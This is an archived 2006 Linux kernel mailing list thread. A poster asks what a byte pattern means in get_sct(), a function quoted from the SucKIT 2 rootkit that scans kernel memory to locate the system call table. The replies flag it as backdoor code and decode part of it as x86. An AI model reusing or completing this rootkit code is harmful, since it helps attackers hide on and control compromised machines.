linux-kernel.vger.kernel.org archive mirror
 help / color / mirror / Atom feed
* What means "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8"
@ 2006-04-06  1:38 openbsd shen
  2006-04-06 12:15 ` linux-os (Dick Johnson)
                   ` (2 more replies)
  0 siblings, 3 replies; 5+ messages in thread
From: openbsd shen @ 2006-04-06  1:38 UTC (permalink / raw)
  To: kernel

this code from get_sct() of suckit 2, why memmem()
"\xc7\x44\x24\x18\xda\xff\xff\xff\xe8"use, what it want to find?
The get_sct() founction:

ulong   get_sct()
{
        uchar   code[SCLEN+256];
        uchar   *p, *pt;
        ulong   r;
        uchar   pt_off, pt_bit;
        int     i;

        kernel_old80 = get_ep();

        if (!kernel_old80)
                return 0;
        if (rkm(code, sizeof(code), kernel_old80-4) <= 0)
                return 0;

        if (!memcmp(code, "PUNK", 4))
                return 0;

        p = (char *) memmem(code, SCLEN, "\xff\x14\x85", 3);
        if (!p) return 0;

        pt = (char *) memmem(p+7, SCLEN-(p-code)-7,
                "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8", 9);
        /* when run at here , it always return 0 */
        if (!pt) {
                eprintf("pt = %s\n", pt);
                return 0;
        }

        sc.trace = *((ulong *) (pt + 9));
        sc.trace += kernel_old80 + (pt - code) - 4 + 9 + 4;

        pt = (char *) memmem(p+7, SCLEN-(p-code)-7, "\xff\x14\x85", 3);
        if (!pt) return 0;

        for (i = 0; i < (p-code); i++) {
                if ((code[i] == 0xf6) && (code[i+1] == 0x43) &&
                    (code[i+4] == 0x75) && (code[i+2] < 127)) {
                        pt_off = code[i+2];
                        pt_bit = code[i+3];
                        goto cc;
                }
        }

        return 0;
}

^ permalink raw reply	[flat|nested] 5+ messages in thread
* Re: What means "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8"
  2006-04-06  1:38 What means "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8" openbsd shen
@ 2006-04-06 12:15 ` linux-os (Dick Johnson)
  2006-04-06 13:32   ` David Schwartz
  2006-04-08  9:06 ` Jan Engelhardt
  2006-04-10 20:17 ` Dan Sheppard
  2 siblings, 1 reply; 5+ messages in thread
From: linux-os (Dick Johnson) @ 2006-04-06 12:15 UTC (permalink / raw)
  To: openbsd shen; +Cc: kernel



In what file did you find this? This is how back-doors are written!

On Wed, 5 Apr 2006, openbsd shen wrote:

> this code from get_sct() of suckit 2, why memmem()
> "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8"use, what it want to find?
> The get_sct() founction:
>
> ulong   get_sct()
> {
>        uchar   code[SCLEN+256];
>        uchar   *p, *pt;
>        ulong   r;
>        uchar   pt_off, pt_bit;
>        int     i;
>
>        kernel_old80 = get_ep();
>
>        if (!kernel_old80)
>                return 0;
>        if (rkm(code, sizeof(code), kernel_old80-4) <= 0)
>                return 0;
>
>        if (!memcmp(code, "PUNK", 4))
>                return 0;
>
>        p = (char *) memmem(code, SCLEN, "\xff\x14\x85", 3);
>        if (!p) return 0;
>
>        pt = (char *) memmem(p+7, SCLEN-(p-code)-7,
>                "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8", 9);
>        /* when run at here , it always return 0 */
>        if (!pt) {
>                eprintf("pt = %s\n", pt);
>                return 0;
>        }
>
>        sc.trace = *((ulong *) (pt + 9));
>        sc.trace += kernel_old80 + (pt - code) - 4 + 9 + 4;
>
>        pt = (char *) memmem(p+7, SCLEN-(p-code)-7, "\xff\x14\x85", 3);
>        if (!pt) return 0;
>
>        for (i = 0; i < (p-code); i++) {
>                if ((code[i] == 0xf6) && (code[i+1] == 0x43) &&
>                    (code[i+4] == 0x75) && (code[i+2] < 127)) {
>                        pt_off = code[i+2];
>                        pt_bit = code[i+3];
>                        goto cc;
>                }
>        }
>
>        return 0;
> }
> -

Cheers,
Dick Johnson
Penguin : Linux version 2.6.15.4 on an i686 machine (5589.42 BogoMips).
Warning : 98.36% of all statistics are fiction, book release in April.
_
\x1a\x04

****************************************************************
The information transmitted in this message is confidential and may be privileged.  Any review, retransmission, dissemination, or other use of this information by persons or entities other than the intended recipient is prohibited.  If you are not the intended recipient, please notify Analogic Corporation immediately - by replying to this message or by sending an email to DeliveryErrors@analogic.com - and destroy all copies of this information, including any attachments, without reading or disclosing them.

Thank you.

^ permalink raw reply	[flat|nested] 5+ messages in thread
* RE: What means "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8"
  2006-04-06 12:15 ` linux-os (Dick Johnson)
@ 2006-04-06 13:32   ` David Schwartz
  0 siblings, 0 replies; 5+ messages in thread
From: David Schwartz @ 2006-04-06 13:32 UTC (permalink / raw)
  To: linux-os (Dick Johnson), openbsd shen; +Cc: kernel


> In what file did you find this? This is how back-doors are written!
> 
> On Wed, 5 Apr 2006, openbsd shen wrote:
> 
> > this code from get_sct() of suckit 2, why memmem()
> > "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8"use, what it want to find?
> > The get_sct() founction:

	As he said, it's from "suckit 2", a root kit.

	Back-doors in a root kit? Whodathunkit. ;)

	DS



^ permalink raw reply	[flat|nested] 5+ messages in thread
* Re: What means "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8"
  2006-04-06  1:38 What means "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8" openbsd shen
  2006-04-06 12:15 ` linux-os (Dick Johnson)
@ 2006-04-08  9:06 ` Jan Engelhardt
  2006-04-10 20:17 ` Dan Sheppard
  2 siblings, 0 replies; 5+ messages in thread
From: Jan Engelhardt @ 2006-04-08  9:06 UTC (permalink / raw)
  To: openbsd shen; +Cc: kernel

>Subject: What means "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8"

Does not look like x86 asm code:

>        p = (char *) memmem(code, SCLEN, "\xff\x14\x85", 3);

call dword ptr [edx-...]

>        pt = (char *) memmem(p+7, SCLEN-(p-code)-7,
>                "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8", 9);

mov dword ptr [esp+0x18], 0xffffffda


Nope, does not look meaningful if taken as x86 asm.


Jan Engelhardt
-- 

^ permalink raw reply	[flat|nested] 5+ messages in thread
* Re: What means "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8"
  2006-04-06  1:38 What means "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8" openbsd shen
  2006-04-06 12:15 ` linux-os (Dick Johnson)
  2006-04-08  9:06 ` Jan Engelhardt
@ 2006-04-10 20:17 ` Dan Sheppard
  2 siblings, 0 replies; 5+ messages in thread
From: Dan Sheppard @ 2006-04-10 20:17 UTC (permalink / raw)
  To: openbsd shen; +Cc: kernel

I can explain this, but I'll need a bit more convincing about your whitehated-ness.

I've been dabbling for a while with custom-kitting a honeypot machine with a kit 
which sits under suckit2 and event-logs it, to see what da kidz get up to on 
sukit'ed machines. Just curiosity, really, having come up against suckit a fair 
few times.

Dan.

^ permalink raw reply	[flat|nested] 5+ messages in thread
end of thread, other threads:[~2006-04-10 20:17 UTC | newest]

Thread overview: 5+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2006-04-06  1:38 What means "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8" openbsd shen
2006-04-06 12:15 ` linux-os (Dick Johnson)
2006-04-06 13:32   ` David Schwartz
2006-04-08  9:06 ` Jan Engelhardt
2006-04-10 20:17 ` Dan Sheppard

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).